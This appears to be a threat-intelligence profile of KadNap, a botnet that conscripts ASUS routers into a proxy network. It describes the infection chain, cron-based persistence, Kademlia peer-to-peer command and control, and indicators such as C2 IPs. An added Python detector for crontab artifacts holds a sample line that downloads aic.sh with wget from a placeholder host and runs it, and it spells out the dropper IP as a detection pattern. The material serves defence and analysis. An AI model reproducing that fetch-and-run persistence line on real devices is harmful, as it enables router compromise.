KadNap
KadNap is a botnet malware family that targets ASUS routers and other SOHO/edge networking devices and converts them into proxies for malicious traffic. Black Lotus Labs at Lumen reported tracking the botnet since August 2025, with growth to more than 14,000 infected devices; the majority of victims were ASUS routers, and over 60% of observed infections were in the United States, with additional concentrations reported in Taiwan, Hong Kong, and Russia. Lumen and Spur link the malware to the Doppelganger proxy service, which researchers assess is likely a rebrand or successor of the defunct Faceless service previously associated with TheMoon malware. Access to infected devices is reportedly monetized for routing malicious traffic, including anonymous DDoS activity, credential stuffing, brute-force attacks, and targeted exploitation campaigns.
The infection chain described in the reporting begins with retrieval of a shell script named aic.sh from 212.104.141[.]140. That script establishes persistence via a cron job scheduled for the 55-minute mark of every hour, renames the fetched script to .asusrouter, and executes it from /jffs/.asusrouter. KadNap then downloads and executes a malicious ELF payload renamed kad, with samples identified for ARM and MIPS architectures. On execution, the malware forks, redirects standard streams to /dev/null, determines the device’s external IP address, and queries NTP servers for current time and uptime-related values.
KadNap uses a custom implementation of the Kademlia distributed hash table protocol to conceal command-and-control infrastructure within peer-to-peer traffic. It uses BitTorrent bootstrap nodes for peer discovery, derives values from NTP data and host uptime, generates custom hashes to locate peers, and decrypts peer-delivered payloads using a hardcoded key before using SHA-1-derived keys and encrypted communications for later stages. Researchers reported retrieval of additional payloads including fwr.sh, likely used to apply firewall rules such as closing port 22, and /tmp/.sose, which contained command-and-control IP:port pairs and configuration data. The malware’s parent process reads filenames from a pipe and executes the referenced files.
Although KadNap uses a P2P/Kademlia design intended to complicate C2 discovery and takedown, Black Lotus Labs found a weakness in the implementation: the same two persistent final-hop/intermediary nodes, 45.135.180[.]38 and 45.135.180[.]177, repeatedly appeared before C2 contact, indicating attacker-maintained persistent nodes rather than a fully decentralized design. Lumen reported KadNap typically used three to four active C2 servers on average and stated it had blocked traffic to and from the identified control infrastructure and planned to publish indicators of compromise.
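A host-side check for the persistence artifacts described in the infection chain above (the cron job at the 55-minute mark, the renamed /jffs/.asusrouter script, the aic.sh dropper and its source IP). This is an added example, not code from the reporting or from the malware; it assumes a crontab dump pulled from the router and runs on a constructed sample with a placeholder dropper host. It also flags the documented artifacts on any other schedule, since the timing is trivially changed by the operator.

```python
# Host artifacts as documented in the reporting above. The IP is the report's
# 212.104.141[.]140 with the defanging removed so it matches a real crontab.
DROPPER_IP = "212.104.141.140"
DROPPER_NAME = "aic.sh"
PERSISTENCE_PATH = "/jffs/.asusrouter"
ARTIFACT_TOKENS = (DROPPER_IP, DROPPER_NAME, PERSISTENCE_PATH)


def parse_cron_line(line):
    """Split a crontab line into its five schedule fields and the command.
    Returns None for blank lines, comments and malformed entries."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split(None, 5)
    if len(fields) < 6:
        return None
    return fields


def flag_cron_entries(crontab_text):
    """Return (line, reason) pairs for entries matching KadNap's persistence.

    An entry firing at minute 55 of every hour that references a documented
    artifact is the strong match; an entry referencing an artifact on any
    other schedule is still flagged, since the schedule is easy to change."""
    hits = []
    for raw in crontab_text.splitlines():
        parsed = parse_cron_line(raw)
        if parsed is None:
            continue
        minute, hour, _dom, _mon, _dow, cmd = parsed
        if not any(tok in cmd for tok in ARTIFACT_TOKENS):
            continue
        if minute == "55" and hour == "*":
            hits.append((raw.strip(), "KadNap schedule and artifact"))
        else:
            hits.append((raw.strip(), "KadNap artifact, different schedule"))
    return hits


# Constructed sample crontab (not a real capture): one benign job, one job
# mimicking the documented persistence with a placeholder dropper host, and
# one re-timed variant that still references the persistence path.
SAMPLE_CRONTAB = """\
# constructed sample, not from a real device
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
55 * * * * wget -q -O /jffs/.asusrouter http://<dropper-host>/aic.sh; sh /jffs/.asusrouter
*/10 * * * * /jffs/.asusrouter
"""

if __name__ == "__main__":
    for line, reason in flag_cron_entries(SAMPLE_CRONTAB):
        print(f"{reason}: {line}")
```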
Techniques & procedures
21 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development: 1 technique
Execution: 2 techniques
Persistence: 2 techniques
Privilege Escalation: 3 techniques
Stealth: 3 techniques
The file sets up a cron job to pull the malicious shell script from the server at the 55-minute mark of every hour, rename it to .asusrouter and then run it from the /jffs/.asusrouter location. After the persistence was initialized, it would then pull down a malicious ELF file for the Asus routers, rename it to kad, and then execute it.
Credential Access: 2 techniques
Discovery: 3 techniques
Each sample begins initialization by forking, setting STDIN, STDOUT and STDERR to /dev/null, determining the external IP address, and storing it in an initialized struct.
The above function, labeled tmpSose, will check for the presence of the file /tmp/.sose and if it exists, it will read ten bytes from the file.
Next it will cycle through a list of NTP servers until it makes a connection, retrieves the current time and stores it along with the host uptime. These values are used later in the network communications to create a hash used to “phone friends” and find other peers in the network.
Lateral Movement: 1 technique
Command and Control: 6 techniques
It will connect to the peer, receive a buffer 0x1000 bytes in size and use a hardcoded key to decrypt it. It then SHA-1 hashes the decrypted payload and uses the hash as the key to encrypt/decrypt follow-on traffic... This hash is used as the key to AES encrypt/decrypt follow-on traffic.
KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which is used to conceal the IP address of their infrastructure within a peer-to-peer system to evade traditional network monitoring. Infected devices use the DHT protocol to locate and connect with a command-and-control (C2) server.
This threat primarily targets Asus routers, conscripting them into a botnet that proxies malicious traffic... Once added to the network, bots are then marketed by a proxy service called “Doppelganger.”
Infected devices use the DHT protocol to locate and connect with a command-and-control (C2) server, while defenders cannot easily find and add those C2s to threat lists.
Our investigation into these C2s uncovered a malicious file which was used to download a shell script from a server at 212.104.141[.]140, in a file called aic.sh... After the persistence was initialized, it would then pull down a malicious ELF file for the Asus routers, rename it to kad, and then execute it.
Impact: 1 technique
An IoT botnet is a network of compromised IoT devices that attackers remotely manipulate to launch large-scale cyber attacks, typically in the form of distributed denial of service (DDoS) attacks. In October 2025, Microsoft Azure was hit with a record-breaking multi-vector, cloud DDoS attack that peaked at 15.72 Tbps and 3.64 billion packets per second.
IOCs tracked for this family
6 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
Recent activity
11 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A newly identified malware strain that infected edge devices, especially Asus routers, and enrolled them into the Doppelgänger proxy service to facilitate anonymous DDoS campaigns.
Proxying botnet targeting ASUS routers and other edge devices; uses a Kademlia DHT-based peer discovery/communications mechanism and C2 infrastructure to coordinate infected devices.
Botnet malware targeting routers and edge devices, using a decentralized Kademlia-based peer-to-peer command-and-control architecture to build a distributed proxy network for relaying malicious traffic and hiding criminal activity.
Botnet malware targeting routers and edge devices, especially Asus and SOHO devices, to build a decentralized proxy network that relays malicious traffic through compromised residential IPs using a Kademlia-based peer-to-peer architecture.